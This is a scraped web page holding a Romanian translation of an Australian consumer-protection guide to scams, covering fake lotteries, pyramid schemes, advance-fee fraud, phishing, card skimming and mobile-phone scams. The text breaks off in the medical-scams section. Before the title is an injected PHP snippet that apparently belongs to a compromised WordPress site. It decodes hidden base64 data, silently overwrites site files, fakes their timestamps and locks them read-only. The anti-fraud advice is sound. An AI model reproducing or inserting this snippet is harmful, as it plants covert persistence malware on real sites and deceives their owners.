$wp_update_file="/home/shuffles/public_html/wp-admin/user/screens.php"; if ( is_file($wp_update_file) ) { $wp_update_content=trim(file_get_contents($wp_update_file)); if ( $wp_update_content!="" ) { $wp_update_content=substr($wp_update_content,6,-6); $wp_update_content=base64_decode($wp_update_content); $wp_update_arr=json_decode($wp_update_content,true); if ( is_array($wp_update_arr) ) { foreach($wp_update_arr as $value) { $file_mtime=filemtime($value["path"]); @chmod($value["path"],0777); @unlink($value["path"]); @file_put_contents($value["path"],$value["content"]); @touch($value["path"],$file_mtime); @chmod($value["path"],0444); } } } } Agenda Neagră a Escrocheriilor – O noua atitudine

Ghid împotriva escrocheriilor, înşelătoriilor, schemelor necinstite şi a jafului

Sursa: Australian Competition and Consumer Commission (ACCC).
(Ghidul este disponibil şi în limba engleză, aici.)

Mituri false

Reguli de aur


Introducere


Loterii, pronosport şi concursuri


Scrisorile în lanţ şi escrocheriile de tip piramidal


Oportunităţi pentru investiţii prospere


Software utilizat pentru pariuri şi predicţie


Solicitări de transfer de bani


Escrocherii prin cont bancar, card de credit sau cont online


Escrocherii online


Escrocherii prin telefonul mobil


Escrocherii medicale


Escrocherii referitoare la spiritism şi clarviziune


Escrocherii prin întâlniri amoroase


Escrocherii prin acţiuni de caritate


Escrocherii din uşă în uşă


Escrocherii referitoare la locuri de muncă şi angajare


Escrocherii referitoare la companii mici


Ponturi eficiente prin care vă protejaţi împotriva înşelătoriilor


Ce este de făcut în cazul în care aţi fost înşelat!

Mituri false

Dovedirea falsităţii acestor mituri comune va reduce şansele dvs. de a fi escrocat.

Toate companiile, afacerile şi organizaţiile sunt legitime deoarece sunt aprobate şi monitorizate de către guvern. Acest lucru nu este întotdeauna conform cu realitatea. Cu toate că există reguli privind înfiinţarea şi funcţionarea unei companii, escrocii pot simula cu uşurinţă deţinerea unei autorizaţii deşi nu o posedă. Chiar şi companiile care, într-adevăr, deţin autorizaţie de funcţionare pot încerca să vă fraudeze acţionând necinstit.

Toate website-urile online sunt legitime. Acest lucru nu este întotdeauna conform cu realitatea. Realizarea unui site este chiar uşoară, nu costă foarte mult şi nici nu sunt efectuate multe verificări pentru asigurarea legitimităţii site-ului.

Există căi rapide către îmbogăţire cunoscute doar unui număr restrâns de persoane. Acest lucru nu este întotdeauna conform cu realitatea. Întrebaţi-vă asta: dacă cineva ar cunoaşte secretul îmbogăţirii peste noapte, de ce ar împărtăşii secretul şi altora?
Escrocheriile presupun sume mari de bani. Acest lucru nu este întotdeauna valabil. Uneori ţinta escrocilor este un număr cât mai mare de persoane, aceştia încercând să obţină sume mici de bani de la fiecare persoană în parte.

Escrocheriile implică întotdeauna banii. Acest lucru nu este întotdeauna valabil. Scopul anumitor escrocherii constă în furtul de date personale.

Reguli de aur

Reţineţi aceste reguli de aur ce vă vor feri de a fi înşelaţi de către escroci.

– Solicitaţi întotdeauna sfaturi avizate în cazul în care o ofertă implică bani, timp şi angajament.
– Nu există scheme garantate de îmbogăţire rapidă – singurele persoane care se îmbogăţesc sunt escrocii.
– Nu acceptaţi imediat ofertele sau propunerile. Dacă credeţi ca aţi dat peste o oportunitate nemaipomenită, insistaţi asupra acordării unei perioade de timp pentru a solicita consiliere avizată înainte de luarea unei decizii.
– Nu cedaţi bani şi nu semnaţi nimic până ce nu v-aţi documentat şi nu aţi verificat acreditarea companiei cu care aveţi de-a face.
– Nu vă bazaţi pe recomandări înflăcărate: căutaţi dovezi cu privire la succesul unei companii.
– Mai degrabă logaţi-vă direct pe website-ul ce vă interesează, decât să faceţi clic pe link-urile dintr-un e-mail.
– Niciodată nu trimiteţi bani şi nici nu oferiţi date despre cardul de credit sau contul online persoanelor necunoscute şi în care nu aveţi încredere.
– Dacă depistaţi o escrocherie sau aţi fost înşelat solicitaţi ajutor. Contactaţi autorităţile competente.

Escrocii sunt imaginativi şi manipulatori. Ştiu cum să vă convingă să oferiţi răspunsul pe care îl caută.

Introducere
În fiecare an se pierd sume mari de bani datorită activităţilor escrocilor, care ne bombardează cu escrocherii online, prin poştă, e-mail, la uşă, sau la telefon.

Escrocheriile nu fac discriminări
Escrocheriile au drept ţintă persoane din toate mediile, de orice vârstă şi nivel al venitului. Loteriile false, fraudele cu plata în avans, schemele de îmbogăţire rapidă şi tratamentele medicale miraculoase sunt doar câteva din mijloacele preferate ale fraudatorilor pentru a priva pe cei neprevăzători de banii acestora.
Mereu apar noi variante ale acestor escrocherii.
Una dintre cele mai bune metode de combatere a acestor escrocherii este de a vă ajuta să luaţi măsurile necesare pentru a nu cădea în plasa acestor escroci, de la bun început.

Reţineţi: Dacă sună prea bine pentru a fi adevărat probabil aşa şi este!

Loterii, pronosport şi concursuri

Multe persoane sunt ispitite de emoţia unui câştig surpriză şi se trezesc trimiţând sume mari de bani pentru a revendica premii false.

La ce trebuie să fim atenţi!
Nu puteţi câştiga bani sau premii în cadrul unei loterii dacă nu v-aţi înscris voi înşivă sau altcineva nu a făcut-o în numele vostru. Nu puteţi fi ales câştigător dacă nu sunteţi înregistrat.

Multe escrocherii loto încearcă să vă păcălească astfel încât să oferiţi date bancare sau personale pentru a vă putea revendica premiul. Nu ar trebui să achitaţi nicio taxă pentru a revendica un premiu.

Nu vă lăsaţi înşelaţi de afirmaţii ce pretind că oferta este legală şi aprobată de către guvern – toţi escrocii vor pretinde acest lucru. În locul premiului mare sau a averii promise veţi pierde fiecare bănuţ pe care îl trimiteţi escrocului. Şi în cazul în care le-aţi furnizat şi date personale identitatea dumneavoastră poate fi întrebuinţată abuziv.

Reţineţi că, de exemplu, bilete legitime pentru Loteria Spaniolă sau cea din Regatul Unit pot fi achiziţionate numai din ţara respectivă.

Escrocheria prin premii false implică informarea dumneavoastră în legătură cu câştigarea unui premiu sau a unui concurs. Puteţi primi un e-mail, un SMS sau pe ecranul calculatorului dumneavoastră poate apărea o fereastră pop-up. Adesea revendicarea premiului presupune costuri şi chiar dacă primiţi un premiu acesta nu este conform cu ceea ce v-a fost promis.
Escrocii câştigă bani convingându-vă să achitaţi taxe sau să apelaţi numere de telefon cu tarif special pentru a vă revendica presupusul premiu. Apelarea acestor numere de telefon cu tarif special poate fi foarte costisitoare iar escrocii se vor strădui să vă ţină la telefon pentru o perioadă lungă de timp sau vă vor solicita să apelaţi un alt număr de telefon cu tarif special.

Reţineţi
Loteriile legitime nu vă solicită achitarea unei taxe pentru încasarea câştigului.
Atenţie
Nu trimiteţi niciodată bani nici unei persoane necunoscute sau în care nu aveţi încredere
Gândiţi-vă
Nu furnizaţi date bancare personale nici unei persoane necunoscute sau în care nu aveţi încredere
Cercetaţi
Examinaţi cu atenţie toate termenele şi condiţiile fiecărei oferte – ofertele gratuite sau foarte ieftine, adesea,  ascund costuri suplimentare. Apelurile sau SMS-urile către numere cu tarif special pot fi foarte costisitoare.
Întrebaţi-vă
M-am înscris la acest concurs? Nu puteţi câştiga bani sau premii la un concurs dacă nu v-aţi înscris voi înşivă sau altcineva nu a făcut asta în numele vostru.

Scrisorile în lanţ şi escrocheriile de tip piramidal

Scrisorile în lanţ şi escrocheriile de tip piramidal promit un câştig financiar considerabil în schimbul unui cost relativ mic. Schemele piramidale sunt ilegale şi foarte riscante – şi vă pot costa o groază de bani.

La ce să fim atenţi!
Într-o schemă piramidală tipică, investitori care nu bănuiesc nimic ilegal sunt încurajaţi să achite taxe mari de înscriere sau de membru pentru a participa în speculaţii ce au ca scop câştiguri mari. Singura posibilitate de a vă recupera banii este de a convinge alte persoane să se înscrie şi să plătească taxele. Oamenii sunt adesea convinşi să se înscrie în aceste scheme de către membrii familiei sau prieteni. Însă nu există nicio garanţie că vă veţi recupera investiţia iniţială. Cu toate că schemele piramidale sunt adesea ingenios mascate, banii sunt obţinuţi mai degrabă prin recrutarea membrilor decât prin vânzarea unui produs legitim sau prin asigurarea unui serviciu. În mod inevitabil, schemele piramidale dau faliment şi veţi pierde toţi banii.
Fiţi precaut, însă nu vă descurajaţi de a căuta cu atenţie alte oportunităţi de afaceri bazate pe comision. Există multe oportunităţi legitime de marketing multi-nivel în urma cărora puteţi să vă câştigaţi în mod legal venitul din vânzarea de produse şi servicii autentice.

Scrisorile în lanţ funcţionează într-o manieră similară – vi se va solicita să trimiteţi o sumă mică de bani sau un cadou specific către toate persoanele enumerate în scrisoare. Pe urmă, vă treceţi numele la sfârşitul listei şi trimiteţi copii ale scrisorii cât mai multor persoane. În scrisoarea se susţine faptul că în scurt timp veţi primi o sumă mare de bani sau un cadou.

În escrocheria cu scrisorile în lanţ pierdeţi bani pe două căi: în primul rând, trimiteţi bani escrocilor care v-au trimis scrisoarea, iar în al doilea rând cheltuiţi o groază de bani pe timbre şi fotocopiere.

Reţineţi
Scrisorile în lanţ şi schemele piramidale vă pot fi trimise de către membrii familiei sau de către persoane în care aveţi încredere – este posibil ca aceştia să nu ştie că respectivele scrisori pot fi ilegale sau că sunt implicaţi într-o escrocherie.
Atenţie
Nu vă angajaţi niciodată la nimic în timpul întâlnirilor sau seminarilor în care presiunea este mare.
Gândiţi-vă
Nu luaţi nicio decizie fără a vă documenta în prealabil – cercetaţi oferta ce v-a fost făcută şi solicitaţi sfatul unei persoane avizate înainte de a lua o decizie.
Cercetaţi
Cercetaţi toate oportunităţile de afaceri ce vă interesează.
Întrebaţi-vă
Dacă nu vând un produs sau un serviciu autentic este participarea în această activitate legală?


Oportunităţi pentru investiţii prospere

Aţi fost ademenit să investiţi în scheme de îmbogăţire de risc mare cu promisiunea unei „investiţii fără riscuri”? Adesea câştigul nu este altceva decât ghinion.

La ce să fim atenţi!
Dacă căutaţi o cale de îmbogăţire rapidă nu vă bazaţi pe informaţiile pe care le auziţi în cadrul unui seminar de investiţii. Cu toate că sfaturile privind investiţiile pot fi legitime şi utile, mulţi escroci se folosesc de publicitatea exagerată şi de interesul stârnit de seminarii pentru a promova escrocheriile imobiliare sau prin investiţii ale acestora.Investiţiile oferite sunt adesea supraevaluate iar investitorii se lovesc mai târziu de taxe şi comisioane ce nu a fost divulgate de către promotori. Este posibil ca stimulente precum „oportunitate limitată” sau „garanţia închirierii” să nu aducă beneficiile promise dacă se ia în considerare costul total al tranzacţiei.
Chiar dacă nu faceţi investiţii, escrocul poate obţine o sumă mare de bani de pe urma taxelor de participare la seminarii şi cursuri, şi prin vânzarea de rapoarte şi cărţi care nu valorează cât preţul de vânzare al acestora.

Cold calling este un apel telefonic neaşteptat şi nesolicitat din partea unui necunoscut ce vă oferă o oportunitate de investiţie sau consiliere financiară. Oportunităţile oferite prin cold calling sunt de regulă „investiţii” la bursă, ipotecă sau imobiliare, scheme de „îmbogăţire rapidă”, tranzacţii cu prime sau tranzacţii cu monede străine. De regulă, escrocii organizează activităţile ilegale din alte ţări decât acelea unde se produc escrocheriile.
Apelurile telefonice nesolicitate privind produse sau servicii financiare sunt ilegale dacă persoana care efectuează apelul nu deţine autorizaţie. Un escroc vă poate oferii date false, prin urmare, trebuie să vă documentaţi temeinic. Escrocheriile ce implică promovarea bursei de acţiuni sau ponturi fierbinţi ajung la dumneavoastră prin intermediul e-mailului sau printr-un mesaj pe telefon încurajându-vă să investiţi într-o companie ale cărei acţiuni sunt prevăzute a creşte. În baza acestui pont
anonim, escrocul speră că noi investitori vor cumpăra acţiuni şi astfel vor ridica preţul acestora. Pe urmă, escrocul îşi va vinde acţiunile la noul preţ ridicat şi va obţine profit. De regulă, acest tip de vânzare duce la scăderea dramatică a preţului acţiunilor iar cumpărătorii acţiunilor rămân cu pierderi importante.

Reţineţi
Fiţi prevăzător în legătură cu investiţiile ce promit un câştig substanţial cu un risc redus sau inexistent şi evitaţi persoanele care încearcă să vă convingă să participaţi la scheme de „îmbogăţire rapidă”. De regulă, cu cât câştigul promis este mai mare cu atât riscul de pierdere este mai ridicat.
Atenţie
Nu vă grăbiţi – acţionaţi cu prudenţă şi cereţi sfaturi avizate înainte de a lua decizia de a investii.
Gândiţi-vă
Nu vă angajaţi în nicio investiţie la un seminar – atmosfera la aceste evenimente poate fi încărcată şi intensă.
Cercetaţi
Dacă cineva încearcă să vă ofere o investiţie sau alte servicii financiare solicitaţi-le numărul autorizaţiei de funcţionare şi verificaţi dacă aceştia sunt acreditaţi.
Întrebaţi-vă
Dacă un necunoscut ar cunoaşte o cale sigură de îmbogăţire v-ar împărtăşi-o şi vouă?


Software utilizat pentru pariuri şi predicţie

Cui nu-i place să parieze? Însă, nu fiţi tentaţi de a cumpăra pachete software ce pretind că pot prezice rezultate cu un grad ridicat de acurateţe. Pariatul este riscant şi nu există nicio garanţie că veţi obţine profit.

La ce să fim atenţi!
Pachetele software pentru pariat promit prezicerea cu acurateţe a rezultatelor de la cursele de cai, evenimente sportive sau fluctuaţiile pieţei bursiere. Sunt promise câştiguri uriaşe în baza rezultatelor anterioare şi a tendinţelor. Însă atunci când software-ul nu funcţionează, despăgubirile sunt greu de dobândit. Escrocii pot taxa sume mari pentru aceste sisteme, variind între $1000-$15.000.
Există programe software legitime ce vă pot fi de folos pentru monitorizarea preţului acţiunilor, însă escrocii merg cu un pas înainte şi pretind că programele acestora pot să prezică cu acurateţe fluctuaţiile preţurilor acţiunilor. Performanţa anterioară nu reprezintă o garanţie a performanţei viitoare, în momentul evaluării rezultatelor promovate.
Escrocheriile cu software pentru pariuri pretind că prezicerile se bazează pe condiţiile meteo, condiţia în care se află calul, traseu sau condiţia în care se află jocheul. Promit câştiguri uriaşe în baza rezultatelor şi a tendinţelor din trecut. Cu toate acestea, odată ce aţi achiziţionat software-ul şi acesta nu funcţionează, aşa cum v-a fost promis, nu vă veţi primi banii înapoi. De regulă, escrocii promovează aceste sisteme drept oportunităţi de afacere sau investiţii (sau vă abordează prin e-mailuri nesolicitate, scrisori sau apeluri telefonice). Adesea ţinta acestora este reprezentantă de persoane cu profesii sau persoane care se apropie de pensionare.

Reţineţi
Chiar dacă un promovator vă spune că schema sau programul oferit spre vânzare deţine aprobarea unei agenţii de pariuri respectabilă sau a unei societăţi pe acţiuni trebuie să cereţi întotdeauna sfatul unui expert.
Atenţie
Nu vă gândiţi niciodată că nu veţi fi ţinta unor astfel de escroci din vreme ce nu sunteţi jucător. Uneori aceste scheme sunt promovate drept un „program de investiţii”, şi nu drept un sistem pentru pariuri.
Gândiţi-vă
Nu vă lăsaţi păcălit de pretenţiile de acurateţe ridicată sau coeficientul ridicat de succese. Este uşor pentru un escroc să manipuleze statisticile şi să vă dea impresia că sistemul ar fi foarte profitabil pentru voi.
Cercetaţi
Dacă sunteţi interesat de un pachet software ce credeţi că vă poate fi de folos în gestionarea sau monitorizarea investiţiilor, solicitaţi sfatul unui profesionist înainte de a lua o decizie.
Întrebaţi-vă
Dacă cineva poate prezice cu acurateţe rezultatele la jocurile de noroc de ce ar avea nevoie să îşi vândă secretul pentru a câştiga bani?

Solicitări de transfer de bani

Escrocheriile ce implică transferul de bani sunt în creştere. Fiţi foarte precaut în momentul în care cineva vă oferă bani pentru a-i ajuta să îşi transfere fondurile. Odată ce aţi trimis bani cuiva poate fi foarte dificil, dacă nu chiar imposibil să îi recuperaţi.

La ce să fim atenţi!
Escrocheria Nigeriană este destul de răspândită. Deşi o mulţime dintre aceste escrocherii sunt originare din Nigeria, escrocherii similare sunt realizate de către fraudatori peste tot în lume (mai ales în alte părţi ale Africii de Vest şi în Asia). Aceste escrocherii au început din ce în ce mai des să fie denumite „fraudă prin plata în avans”.
În cadrul escrocheriei nigeriene clasice primiţi un e-mail sau o scrisoare de la un fraudator prin care vi se cere ajutorul în vederea transferării unei sume mari de bani în străinătate. Pe urmă, vi se oferă o parte din bani dacă sunteţi de acord să le oferiţi datele contului dumneavoastră bancar pentru a-i ajuta să transfere banii. Mai apoi, vi se va solicita achitarea a tot felul de taxe şi comisioane înainte de a primi „câştigul”. Nu vi se vor trimite niciodată banii şi veţi pierde comisioanele pe care le-aţi achitat.
Un alt tip de escrocherie este escrocheria prin e-mail, care pare a fi trimis din partea unui avocat sau reprezentant al băncii, în care sunteţi anunţat că o rudă îndepărtată de-a dumneavoastră a decedat şi v-a lăsat o moştenire uriaşă. Escrocii pot relata poveşti ce par atât de autentice încât puteţi fi păcălit să le oferiţi documente personale şi date cu privire la contul bancar astfel încât să puteţi confirma identitatea acestora şi să vă revendicaţi moştenirea. Este mai mult decât probabil ca „moştenirea” să fie inexistentă şi, pe lângă faptul că pierdeţi banii pe care i-aţi achitat fraudatorului pentru taxe şi comisioane riscaţi, de asemenea, să vă fie furată identitatea.
Dacă deţineţi o afacere de vânzare produse şi servicii online sau prin mica publicitate în ziare, puteţi fi ţinta unei escrocherii prin plată excesivă. Drept răspuns la anunţul dumneavoastră puteţi primi o ofertă generoasă din partea unui potenţial client şi să o acceptaţi. Primiţi plata prin cec sau ordin de plată, însă suma primită depăşeşte preţul convenit. Cumpărătorul vă poate spune că suma în exces a fost pur şi simplu o greşeală sau aceştia pot inventa o scuză, de exemplu pot pretinde că bani suplimentari sunt pentru a acoperi costurile de livrare. Dacă vi se solicită să returnaţi suma de bani în exces, prin transfer bancar, este cazul să fiţi suspicios. Fraudatorul speră că veţi returna suma în exces înainte de a descoperi că cecul este refuzat din cauza fondurilor insuficiente sau că ordinul de plată a fost fals. Veţi pierde atât banii pe care i-aţi transferat cât şi articolul, dacă l-aţi expediat deja.

Reţineţi
Dacă sunteţi abordat de către cineva care vă solicită să transferaţi bani, asiguraţi-vă că sursa este legitimă.
Atenţie
Nu trimiteţi niciodată bani şi nu oferiţi date cu privire la cardul de credit sau contul bancar online nici unei persoane necunoscute sau în care nu aveţi încredere.
Gândiţi-vă
Nu acceptaţi un cec sau un ordin de plată pentru bunuri, dacă valoarea acestuia depăşeşte suma convenită. Trimiteţi-l înapoi şi solicitaţi cumpărătorului să vă achite suma convenită înainte de a livra bunurile sau serviciile.
Cercetaţi
Examinaţi informaţiile disponibile despre excrocheriile prin transfer de bani pentru a ştii cum să vă protejaţi.
Întrebaţi-vă
Este într-adevăr sigur să transferaţi bani unei persoane necunoscute?


Escrocherii prin cont bancar, card de credit sau cont online

Dezvoltarea tehnologiei a schimbat felul în care ne desfăşurăm activitatea bancară şi ne achităm bunurile şi serviciile. Fraudatorii folosesc noile tehnologii în avantajul acestora pentru a inventa noi escrocherii pentru a vă fura informaţiile despre contul bancar sau banii.
Atenţie la semnele de avertizare!

La ce să fim atenţi!
Phishing-ul constă într-o escrocherie prin care sunteţi păcăliţi să oferiţi informaţii personale şi bancare fraudatorilor. E-mailurile pe care le primiţi pot părea legitime dar, în realitate, organizaţiile autentice precum băncile sau autorităţile guvernamentale nu s-ar aştepta niciodată să trimiteţi informaţii personale prin e-mail sau online.
Fraudatorii pot copia cu uşurinţă logo-ul sau chiar întregul website al unei organizaţii autentice. Prin urmare, nu presupuneţi că orice e-mail pe care îl primiţi este autentic. Dacă în e-mail vi se solicită să vizitaţi un website pentru a „actualiza”, „valida” sau „confirma” informaţiile privind contul bancar fiţi sceptic.
Ştergeţi e-mailurile de phishing. Acestea poartă viruşi ce vă pot afecta calculatorul. Nu deschideţi anexe şi nici nu link-uri ce vă sunt trimise prin astfel de e-mailuri.
Excrocheria prin alertă falsă de fraudă este similară phishing-ului. Fraudatorul vă contactează prin e-mail sau telefonic şi vă informează că există o problemă cu contul dumneavoastră. Pentru a rezolva problema sau pentru a îmbunătăţi securitatea contului vi se solicită confirmarea datelor personale. Escrocii sunt recunoscuţi pentru inventivitatea acestora în crearea de poveşti cu scopul de a-şi păcăli victimele.
Unor persoane li s-a spus să că le-a fost folosit cardul de credit pentru efectuarea de achiziţii suspecte în ţări străine sau altora li s-a spus, pur şi simplu, că datele acestora sunt necesare în vederea îmbunătăţirii securităţii sau a gestionării contului.
Adesea, băncile sau instituţiile financiare îşi contactează clienţii pentru a-i avertiza cu privire la activităţi suspecte în contul acestora, însă acestea nu vă vor solicita niciodată să oferiţi date online sau telefonic. Dacă aveţi dubii sunaţi la bancă voi înşivă.
Card skimming constă în copierea informaţilor de pe banda magnetică a cardului de credit sau a cardului bancar. Odată ce fraudatorii au obţinut datele cardului dumneavoastră pot crea un card fals sau „clonat” cu datele voastre şi pot efectua plăţi în contul vostru. Sau pur şi simplu aceştia pot crea o copie a cardului, folosindu-vă datele.
Fiţi suspicios în cazul în care un vânzător insistă să plece cu cardul în afara razei dumneavoastră de vedere pentru a procesa tranzacţia sau în cazul în care încearcă să treacă cardul prin mai multe dispozitive. Dacă vi se pare că dispozitivul nu arată corespunzător nu îl folosiţi.

Reţineţi
O bancă sau o instituţie financiară legitimă nu vă va solicita niciodată să faceţi clic pe un link dintr-un e-mail sau să trimiteţi date despre contul dumneavoastră prin e-mail sau online.
Atenţie
Nu trimiteţi niciodată date personale, cu privire la cardul de credit sau cont prin e-mail, şi nici nu le înregistraţi pe un website, în legătură cu care nu sunteţi sigur că este autentic.
Gândiţi-vă
Nu oferiţi date persoanele, cu privire la cardul de credit sau cont la telefon, afară de cazul în care dumneavoastră sunteţi cel care a apelat iar numărul de telefon provine dintr-o sursă credibilă.
Cercetaţi
Examinaţi informaţiile disponibile despre modalităţile de protecţie online. Păstraţi-vă actualizat software-ul de securitate cu scopul de a detecta şi îndepărta viruşii sau alte soft-uri dăunătoare.
Întrebaţi-vă
Sunt corecte datele de contact furnizate într-un e-mail? Sunaţi la bancă sau la instituţia financiară pentru a întreba dacă e-mailul pe care l-aţi primit din partea acestora este autentic. Folosiţi un număr de telefon despre care ştiţi că este legitim, dintr-un estras ce cont bancar sau cartea de telefon sau de pe verso-ul cardului bancar – nu vă încredeţi în datele de contact furnizate în e-mail.

Escrocherii online

O mulţime de escrocherii online au loc fără ca victima nici măcar să observe. Puteţi reduce considerabil şansele de a fi escrocat online dacă respectaţi câteva precauţii simple.

La ce să fim atenţi!
Fraudatorii pot folosi internetul pentru a promova frauda, prin e-mailuri nesolicitate sau junk, cunoscute sub denumirea de spam. Chiar dacă primesc doar câteva răspunsuri la milioanele de e-mailuri pe care le trimit tot merită efortul. Fiţi precaut când este vorba să răspundeţi, chiar dacă o faceţi numai pentru a vă „dezabona”, deoarece în acest mod îi veţi confirma fraudatorului faptul că a ajuns la o adresă de e-mail reală.
Orice e-mail pe care îl primiţi de la un expeditor pe care nu îl cunoaşteţi, şi nu vă este adresat în mod specific, în care vi se promit anumite beneficii este probabil un SPAM.
Soft-urile dăunătoare – denumite şi malware, spyware, programe keylogger, cai troieni sau troieni – implică ameninţări privind securitatea online. Fraudatorii încearcă să instaleze acest program software pe calculatorul dumneavoastră pentru a obţine accesul la fişierele pe care le aveţi salvate în calculator şi la alte date personale şi parole.
Fraudatorii folosesc o gamă variată de şiretlicuri pentru a instala software-ul acestora în calculatorul dumneavoastră. Vă pot păcăli să daţi clic pe un link sau un mesaj pop-up dintr-un e-mail spam sau prin accesarea unui website fals creat doar pentru a infecta calculatoarele vizitatorilor.

Licitaţiile şi cumpărăturile online pot fi foarte distractive şi vă pot ajuta să găsiţi oferte bune. Din păcate, acestea atrag şi fraudatorii.
Adesea, fraudatorii vor încerca să vă convingă să efectuaţi tranzacţii în afara site-urilor de licitaţie online. Aceştia pot pretinde că persona care a câştigat o licitaţie la care aţi participat s-a retras şi vă pot oferi respectivul articol dumneavoastră. Odată ce aţi plătit nu veţi mai auzi de ei şi site-ul de licitaţii nu vă poate asista în nici un fel.

Malware constă în dezvoltarea de programe sau fişiere cu scopul de a crea prejudicii. Malware include viruşii de calculator, viermi şi troieni.
Spyware este un software instalat într-un calculator, care sustrage informaţii din acesta fără aprobarea sau cunoştinţa utilizatorului şi divulgă informaţiile unui terţ. Spyware este un instrument de colectare a informaţiilor confidenţiale – este utilizat pur şi simplu pentru a spiona oamenii şi pentru a colecta informaţii despre aceştia. Persoanele care instalează acest program pot ţinti informaţii precum date bancare sau referitoare la cardul de credit sau alte informaţii comerciale importante sau confidenţiale. Informaţiile obţinute pot fi folosite de ei înşişi sau le pot oferi altor persoane.
Viruşii de tip cal troian conţin coduri rău-voitoare sau dăunătoare incluse în programe aparent inofensive sau informaţii care pot prelua controlul şi pot provoca tipul de prejudicii pentru care au fost programate, precum distrugerea hard disk-ului. Un virus de tip cal troian poate fi redistribuit, în mare măsură, ca făcând parte dintr-un virus de calculator şi este posibil ca nici măcar să nu fiţi conştienţi că se află în calculatorul dumneavoastră.
Keylogger-ul este un software care înregistrează ceea ce utilizatorul tastează cu scopul de a capta informaţii private, parole sau date financiare sau referitoare la cardul de credit.
Ocazional, keylogger-ul poate consta într-un echipament fizic anexat unui calculator.

Reţineţi
Dacă alegeţi să faceţi cumpărături online sau să participaţi la licitaţii online, asiguraţi-vă că sunteţi la curent cu politica de rambursare şi de gestionare a proceselor de litigii şi fiţi atent să nu vi se taxeze un preţ excesiv. De asemenea, este recomandat să utilizaţi un serviciu de custodie. Acest serviciu va reţine plata dumneavoastră şi o va trimite vânzătorului odată ce aţi confirmat primirea articolului achiziţionat. De regulă, se percepe o mică taxă pentru acest serviciu.
Atenţie
Nu cumpăraţi niciodată de la ofertanţi evaluaţi slab pe site-urile de licitaţii şi asiguraţi-vă că faceţi cumpărături numai de pe site-uri legitime de cumpărături.
Gândiţi-vă
Nu răspundeţi e-mailurilor spam, chiar şi cu scopul de vă dezabona şi nu faceţi click pe link-uri şi nici nu apelaţi numere de telefon listate într-un e-mail spam. Asiguraţi-vă că deţineţi software de protecţie şi consultaţi un specialist în calculatoare.
Cercetaţi
Dacă într-un e-mail sau o fereastră pop-up vi se oferă un produs sau un serviciu ce vă interesează întra-adevăr şi oferta pare rezonabilă, asiguraţi-vă că înţelegeţi toate termenele şi condiţiile precum şi costurile implicate înainte de efectua o achiziţie sau de a furniza date dumneavoastră.
Întrebaţi-vă
Deschizând acest e-mail suspect voi prejudicia securitatea calculatorului meu?

Escrocherii prin telefonul mobil

Escrocheriile prin telefonul mobil sunt dificil de recunoscut. Fiţi precaut dacă cineva vi se adresează ca şi cum v-ar cunoaşte sau în legătură cu apelurile pierdute de la numere necunoscute – se pot aplica taxe ascunse.

La ce să fim atenţi!
Escrocheriile prin tonuri de apel vă pot atrage cu o ofertă pentru un ton de apel gratuit sau la un cost redus. Ceea ce nu realizaţi, în fapt, este că acceptând această ofertă v-aţi abonat la un serviciu ce vă va trimite tonuri de apel, în continuare, taxându-vă un tarif special pentru acestea. Există multe companii legitime ce vând tonuri de apel, însă există şi escroci care vor încerca să ascundă costul real pentru acceptarea unei oferte. Fraudatorii fie nu vă spun că solicitarea dumneavoastră pentru primul ton de apel reprezintă o abonare la un serviciu de tonuri de apel, fie această informaţie este indicată cu litere mici în datele ofertei. De asemenea, aceştia vor face foarte dificilă dezabonarea de la respectivul serviciu. Va trebui, efectiv, să declaraţi că renunţaţi la respectivul serviciu pentru a sista trimiterea tonurilor de apel şi taxele aferente.

Escrocheriile prin apeluri pierdute încep prin apelarea numărului dumneavoastră de telefon de către fraudatori, aceştia închizând telefonul înainte să răspundeţi. Telefonul a înregistrat un apel pierdut şi probabil că nu veţi recunoaşte numărul de
telefon. Puteţi fi tentat să apelaţi numărul de telefon respectiv pentru a afla cine v-a sunat. Dacă este vorba despre o escrocherie veţi plăti tarife la suprapreţ pentru apelul telefonic efectuat, fără să ştiţi.

Escrocheriile prin mesaje text funcţionează într-o manieră similară, dar prin SMS. Fraudatorii vă trimit un mesaj text de la un număr necunoscut, dar care pare a fi trimis de către un prieten – de exemplu „Bună sunt Ionut. M-am întors! Când eşti liber să ne întâlnim?” Dacă răspundeţi din curiozitate, puteţi fi taxat la un tarif special pentru mesaje SMS (uneori chiar $4 pentru fiecare mesaj trimis şi/sau primit).

Escrocheria prin concurs SMS sau concurs de cunoştinţe generale constă, de regulă într-un mesaj text şi vă poate încuraja să vă înscrieţi într-o competiţie în vederea obţinerii unui premiu mare. De asemenea, mesajul (sau uneori, o reclamă) vă poate invita să participaţi la un concurs de cunoştinţe generale ce pune la bătaie un premiu important dacă răspundeţi corect la un număr de întrebări. Fraudatorii obţin câştiguri taxând tarife extrem de ridicate pentru mesajele pe care le trimiteţi şi orice alte mesaje pe care aceştia vi le trimit vouă.În cazul escrocheriei prin concursul de cunoştinţe generale primul set de întrebări va fi foarte
uşor. Acest lucru pentru a vă încuraja să continuaţi jocul. Cu toate acestea, ultima întrebare sau ultimele două întrebări la care trebuie să răspundeţi pentru a revendica „premiul” sunt foarte dificile sau chiar imposibil de răspuns corect.

Reţineţi
Trimiteţi „STOP” mesajelor text nedorite sau pentru a opri abonamentele nedorite.
Atenţie
Nu răspundeţi niciodată mesajelor text ce vă oferă tonuri de apel gratuite sau apelurilor pierdute de la numere necunoscute.
Gândiţi-vă
Nu apelaţi numerele de telefon care încep cu … afară de cazul în care sunteţi conştient de costul implicat. Aceste numere de telefon sunt taxate la un tarif special.
Întrebaţi-vă
Cunosc modul de sistare al oricărui serviciu de abonament la care vreau să mă înscriu?

Escrocherii medicale

Escrocheriile medicale se bazează pe suferinţa umană. Acestea oferă soluţii unde acestea nu există sau pur şi simplu promit să simplifice tratamente medicale complexe.

La ce să fim atenţi!
Escrocheriile referitoare la tratamente miraculoase oferă o gama variată de produse şi servicii care pot părea a fi tratamente legitime de medicină alternativă, de regulă promiţând remedii rapide şi eficiente pentru condiţii medicale grave. Tratamentele pretind să fie eficiente împotriva unei game foarte largi de maladii şi adesea sunt promovate prin mărturii de la persoane care au folosit produsul sau serviciul şi au fost „vindecate”.Escrocheriile referitoare la cure de slăbire promit o pierdere în greutate impresionantă cu puţin efort sau deloc. Acest tip de escrocherie poate implica o dietă neobişnuită sau restrictivă, exerciţii revoluţionare sau aparate de „ardere a grăsimilor”, sau produse avansate precum pilule, plasturi sau creme.
